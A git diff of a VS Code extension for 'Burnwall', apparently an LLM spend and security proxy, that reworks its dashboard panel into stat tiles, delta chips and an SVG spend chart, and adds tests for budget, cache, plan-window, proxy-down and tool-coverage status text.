return RED; +} + +/** A percent-change chip (`▲ 12%` / `▼ 7%` / `→ 0%`) HTML, or "" when there is + * no baseline to compare against (prev == 0). Mirrors term.rs::delta_chip_pct. */ +function deltaChipPct(curr: number, prev: number, trend: Trend): string { + if (!isFinite(prev) || prev === 0) return ""; + const r = Math.round(((curr - prev) / prev) * 100); + const flat = Math.abs(r) < 1; + const text = flat ? "→ 0%" : r > 0 ? `▲ ${r}%` : `▼ ${Math.abs(r)}%`; + const color = deltaColor(r > 0, flat, trend); + return `
${esc(text)} vs yest.
`; +} + +/** An absolute-count chip (`▲ 3` / `▼ 5`), or "" when the counts are equal. */ +function deltaChipCount(curr: number, prev: number, trend: Trend): string { + if (curr === prev) return ""; + const diff = curr - prev; + const text = diff > 0 ? `▲ ${diff}` : `▼ ${Math.abs(diff)}`; + const color = deltaColor(diff > 0, false, trend); + return `
${esc(text)} vs yest.
`; +} + +/** A thin CSS progress bar filled to `pct` (0..100) in `color`. */ +function bar(pct: number, color: string): string { + const w = Math.max(0, Math.min(100, pct)); + return `
`; +} + +/** One stat tile: label, headline value, optional delta chip, bar, sub-line. */ +function card( + label: string, + value: string, + opts: { delta?: string; bar?: string; sub?: string; valueColor?: string } = {}, +): string { + const valStyle = opts.valueColor ? ` style="color:${opts.valueColor}"` : ""; + return `
+
${esc(label)}
+
${esc(value)}
+ ${opts.delta ?? ""} + ${opts.bar ?? ""} + ${opts.sub ? `
${esc(opts.sub)}
` : ""} +
`; +} + +/** Pre-rendered, script-free SVG area+line of the daily-spend series. Returns + * "" when there's nothing to plot. Colours come from theme variables, so the + * chart adapts to the user's theme exactly like the rest of the panel. */ +function spendChartSvg(series: number[] | undefined): string { + const pts = (series ?? []).filter((v) => typeof v === "number" && isFinite(v)); + if (pts.length < 2 || pts.every((v) => v <= 0)) return ""; + const W = 600; + const H = 140; + const padX = 6; + const padTop = 12; + const padBot = 10; + const max = Math.max(...pts); + const n = pts.length; + const x = (i: number) => padX + (i * (W - 2 * padX)) / (n - 1); + const y = (v: number) => { + const h = H - padTop - padBot; + const frac = max > 0 ? v / max : 0; + return padTop + (1 - frac) * h; + }; + const line = pts.map((v, i) => `${i === 0 ? "M" : "L"}${x(i).toFixed(1)},${y(v).toFixed(1)}`).join(" "); + const baseline = (H - padBot).toFixed(1); + const area = `${line} L${x(n - 1).toFixed(1)},${baseline} L${x(0).toFixed(1)},${baseline} Z`; + const lastX = x(n - 1).toFixed(1); + const lastY = y(pts[n - 1]).toFixed(1); + return `
+ + + + + + + + + +
`; +} + /** Render the panel HTML from the digest + status JSON. Pure. */ export function panelHtml(digest: Digest, status: Status): string { - const today = money(status.total_cost_usd); - const limit = status.budget?.daily_limit_usd ?? 0; - const budgetLine = - limit > 0 ? `${today} of ${money(limit)} today` : `${today} today (no daily limit set)`; + // ── derived figures ───────────────────────────────────────────────────── + const todayCost = num(status.total_cost_usd); + const turns = num(digest.turns); + const limit = num(status.budget?.daily_limit_usd); + const spent = status.budget?.spent_today_usd ?? todayCost; + const budgetPct = limit > 0 ? (num(spent) / limit) * 100 : null; + + let cacheRead = 0; + let promptTotal = 0; + for (const b of status.breakdown ?? []) { + const read = num(b.cache_read_tokens); + cacheRead += read; + promptTotal += num(b.input_tokens) + num(b.cache_creation_tokens) + read; + } + const cachePct = promptTotal > 0 ? (cacheRead / promptTotal) * 100 : null; + + const blocked = num(status.security_blocked ?? status.blocked_requests); + const alerts = num(status.security_alerts); + + const prev = status.previous_day ?? {}; + const prevCost = num(prev.cost_usd); + const prevCache = num(prev.cache_hit_pct); + const prevBlocked = num(prev.blocked); + + // ── stat tiles ────────────────────────────────────────────────────────── + const spendCard = card("Spend", money(todayCost), { + delta: deltaChipPct(todayCost, prevCost, "higherWorse"), + sub: `${turns} turn${turns === 1 ? "" : "s"}`, + }); + const budgetCard = + budgetPct !== null + ? card("Budget", `${budgetPct.toFixed(0)}%`, { + bar: bar(budgetPct, gaugeColor(budgetPct)), + sub: `of ${money(limit)} daily`, + valueColor: gaugeColor(budgetPct), + }) + : card("Budget", "no cap", { sub: "no daily limit set" }); + + const cacheCard = + cachePct !== null + ? card("Cache", `${cachePct.toFixed(0)}%`, { + delta: deltaChipPct(cachePct, prevCache, "higherBetter"), + bar: bar(cachePct, GREEN), + sub: "hit rate", + valueColor: GREEN, + }) + : card("Cache", "n/a", { sub: "no prompt tokens yet" }); + + const blockedCard = card("Blocked", String(blocked), { + delta: deltaChipCount(blocked, prevBlocked, "higherWorse"), + sub: `${alerts} alert${alerts === 1 ? "" : "s"}`, + valueColor: blocked > 0 ? RED : undefined, + }); + + // ── spend trend chart ─────────────────────────────────────────────────── + const series = status.spend_series ?? []; + const chart = spendChartSvg(series); + const seriesTotal = series.reduce((a, b) => a + num(b), 0); + const chartSection = chart + ? `

Spend · last ${series.length} days

+
${esc(money(seriesTotal))} total${ + deltaChipPct(todayCost, prevCost, "higherWorse") + ? `${deltaChipPct(todayCost, prevCost, "higherWorse")}` + : "" + }
+ ${chart}` + : ""; + + // ── cost-by-model table (with share-of-spend bars) ────────────────────── + const models = digest.models ?? []; + const modelTotal = models.reduce((a, m) => a + num(m.cost_usd), 0); const modelRows = - (digest.models ?? []) - .map( - (m) => - `${esc(m.provider)}/${esc(m.model)}${esc(m.requests ?? 0)}${money(m.cost_usd)}`, - ) - .join("") || `(no spend in window)`; + models + .map((m) => { + const share = modelTotal > 0 ? (num(m.cost_usd) / modelTotal) * 100 : 0; + return `${esc(m.provider)}/${esc(m.model)}${esc( + m.requests ?? 0, + )}${money(m.cost_usd)}`; + }) + .join("") || `(no spend in window)`; + // ── security + MCP detail ─────────────────────────────────────────────── const secRows = (digest.security_by_type ?? []) - .map((s) => `
  • ${esc(s.event_type)}: ${esc(s.count ?? 0)}
  • `) - .join("") || "
  • (none)
  • "; + .map((s) => `${esc(s.event_type)}: ${esc(s.count ?? 0)}`) + .join("") || `no events`; const mcpRows = (digest.mcp_tools ?? []) - .map((t) => `
  • ${esc(t.server)}/${esc(t.tool)} — ${esc(t.trust_state)}
  • `) - .join("") || "
  • (none)
  • "; + .map((t) => `${esc(t.server)}/${esc(t.tool)} · ${esc(t.trust_state)}`) + .join("") || `none`; return ` -
    🛡️ Burnwall
    -

    ${esc(budgetLine)} · ${esc(digest.turns ?? 0)} turns · ${esc(digest.blocked ?? 0)} blocked · window cost ${money(digest.total_cost_usd)}

    +

    🔥 Burnwall

    Today
    + +
    + ${spendCard} + ${budgetCard} + ${cacheCard} + ${blockedCard} +
    + + ${chartSection} -

    Cost by model (window)

    - ${modelRows}
    provider/modelreqcost
    +

    Cost by model

    + + + ${modelRows} +
    Provider / ModelReqCostShare

    Security blocks

    -
      ${secRows}
    +
    ${secRows}

    MCP tools (${esc(digest.mcp_tool_calls ?? 0)} calls)

    -
      ${mcpRows}
    +
    ${mcpRows}
    `; } diff --git a/editor/vscode/test/format.test.ts b/editor/vscode/test/format.test.ts index 225c8d5..61a71a9 100644 --- a/editor/vscode/test/format.test.ts +++ b/editor/vscode/test/format.test.ts @@ -18,9 +18,12 @@ test("summarize computes cost, blocked, cache hit rate, and budget %", () => { assert.equal(Math.round(s.budgetPercent ?? 0), 35); }); -test("combined_total_usd is preferred over total_cost_usd", () => { +test("the bar headlines the proxied total, not the combined figure (X4/U-H3)", () => { + // The proxied number is what Burnwall can vouch for; combined (proxied + + // unproxied logs) is panel detail, and previously double-counted proxied + // Claude Code into the headline. const s = summarize({ total_cost_usd: 1, combined_total_usd: 5 }); - assert.equal(s.costToday, 5); + assert.equal(s.costToday, 1); }); test("no tokens -> null cache hit rate; no limit -> null budget %", () => { @@ -52,3 +55,114 @@ test("tooltip notes when no daily limit is set", () => { const tip = tooltip(summarize({ total_cost_usd: 1 })); assert.ok(tip.includes("no daily limit set"), tip); }); + +test("subscription plan: status bar leads with the binding window, not dollars", () => { + const s = summarize({ + total_cost_usd: 190.11, + plan: { + providers: [ + { + provider: "anthropic", + status: "allowed", + windows: [ + { label: "5h", utilization: 0.17, reset_in_secs: 7007 }, + { label: "7d", utilization: 0.1, reset_in_secs: 198495 }, + ], + }, + ], + }, + }); + assert.ok(s.plan, "plan should be summarized"); + const text = statusBarText(s); + assert.ok(text.includes("5h 17% (1h56m)"), text); + assert.ok(!text.includes("$190"), text); // notional dollars suppressed + const tip = tooltip(s); + assert.ok(tip.includes("Plan (anthropic)"), tip); + assert.ok(tip.includes("7d: 10% used"), tip); +}); + +test("no plan -> dollar status bar (API / fallback)", () => { + const s = summarize({ total_cost_usd: 2, plan: null }); + assert.equal(s.plan, null); + assert.ok(statusBarText(s).includes("$2.00")); +}); + +test("subscription plan: throttled flag surfaces", () => { + const s = summarize({ + plan: { + providers: [ + { + provider: "anthropic", + status: "throttled", + windows: [{ label: "5h", utilization: 1.0, reset_in_secs: 600 }], + }, + ], + }, + }); + assert.ok(statusBarText(s).includes("throttled")); +}); + +test("warning-grade plan status is NOT throttled (U-H4)", () => { + const s = summarize({ + plan: { + providers: [ + { + provider: "anthropic", + status: "allowed_warning", + windows: [{ label: "5h", utilization: 0.85, reset_in_secs: 600 }], + }, + ], + }, + }); + assert.equal(s.plan?.throttled, false); + assert.ok(!statusBarText(s).includes("throttled")); +}); + +test("routed at a dead proxy beats all other status (U-C1)", () => { + const s = summarize({ + total_cost_usd: 2, + env_routing: "proxied", + proxy_running: false, + }); + assert.equal(s.proxyDown, true); + assert.ok(statusBarText(s).includes("DOWN")); + assert.ok(tooltip(s).includes("PROXY DOWN")); +}); + +test("proxy running while routed is not flagged down", () => { + const s = summarize({ + total_cost_usd: 2, + env_routing: "proxied", + proxy_running: true, + }); + assert.equal(s.proxyDown, false); +}); + +test("coverage: a bypassing tool warns in the status bar and tooltip", () => { + const s = summarize({ + total_cost_usd: 2, + coverage: [ + { tool: "Claude Code", binary: "claude", state: "protected", seen_secs_ago: 120 }, + { + tool: "Codex CLI", + binary: "codex", + state: "bypasses", + reason: "Codex on ChatGPT login routes to the ChatGPT backend", + }, + ], + }); + const text = statusBarText(s); + assert.ok(text.includes("$(warning) Codex CLI unprotected"), text); + const tip = tooltip(s); + assert.ok(tip.includes("Coverage (routes through Burnwall):"), tip); + assert.ok(tip.includes("Claude Code: protected (seen 2m ago)"), tip); + assert.ok(tip.includes("Codex CLI: NOT protected"), tip); +}); + +test("coverage: all-protected shows no status-bar warning", () => { + const s = summarize({ + total_cost_usd: 2, + coverage: [{ tool: "Claude Code", binary: "claude", state: "protected", seen_secs_ago: 30 }], + }); + assert.ok(!statusBarText(s).includes("unprotected")); +}); diff --git a/editor/vscode/test/panel.test.ts b/editor/vscode/test/panel.test.ts index d1af4c0..f2f3cfc 100644 --- a/editor/vscode/test/panel.test.ts +++ b/editor/vscode/test/panel.test.ts @@ -3,7 +3,7 @@ import { test } from "node:test"; import { panelHtml } from "../src/panel_view"; -test("panelHtml renders models, security, MCP, and budget", () => { +test("panelHtml renders stat cards, models, security, and MCP", () => { const html = panelHtml( { total_cost_usd: 3.5, @@ -14,13 +14,67 @@ test("panelHtml renders models, security, MCP, and budget", () => { security_by_type: [{ event_type: "path_blocked", count: 1 }], mcp_tools: [{ server: "fs", tool: "read", trust_state: "approved" }], }, - { total_cost_usd: 1.25, budget: { daily_limit_usd: 10, spent_today_usd: 1.25 } }, + { + total_cost_usd: 1.25, + budget: { daily_limit_usd: 10, spent_today_usd: 1.25 }, + security_blocked: 2, + security_alerts: 5, + breakdown: [{ input_tokens: 100, cache_creation_tokens: 0, cache_read_tokens: 900 }], + }, ); + // Spend tile + model table. + assert.ok(html.includes("$1.25"), html); assert.ok(html.includes("claude-opus-4-7"), html); assert.ok(html.includes("$3.50"), html); + // Budget tile sub-line (13% of $10.00 daily). + assert.ok(html.includes("of $10.00 daily"), html); + // Cache tile derived from the breakdown (900 read / 1000 prompt = 90%). + assert.ok(html.includes("90%"), html); + // Blocked tile uses the honest split: 2 blocked, "5 alerts". + assert.ok(html.includes("5 alerts"), html); + // Security + MCP detail. assert.ok(html.includes("path_blocked: 1"), html); assert.ok(html.includes("fs/read"), html); - assert.ok(html.includes("$1.25 of $10.00 today"), html); +}); + +test("panelHtml renders delta chips, SVG spend chart, and share bars", () => { + const html = panelHtml( + { + models: [ + { provider: "anthropic", model: "claude-opus-4-7", requests: 10, cost_usd: 8.0 }, + { provider: "openai", model: "gpt-4o", requests: 4, cost_usd: 2.0 }, + ], + }, + { + total_cost_usd: 0.95, + budget: { daily_limit_usd: 10, spent_today_usd: 0.95 }, + security_blocked: 1, + security_alerts: 0, + breakdown: [{ input_tokens: 100, cache_creation_tokens: 0, cache_read_tokens: 900 }], + spend_series: [0.3, 0.1, 0.4, 0.05, 0.55, 0.2, 0.95], + previous_day: { cost_usd: 0.2, cache_hit_pct: 80, blocked: 5 }, + }, + ); + // Spend up 0.20 → 0.95 ≈ +375% → up chip; cache 90 vs 80 → up chip. + assert.ok(html.includes("▲"), html); + // Fewer blocks than yesterday (1 vs 5) → a down chip. + assert.ok(html.includes("▼"), html); + // Static SVG spend chart is present (script-free ), no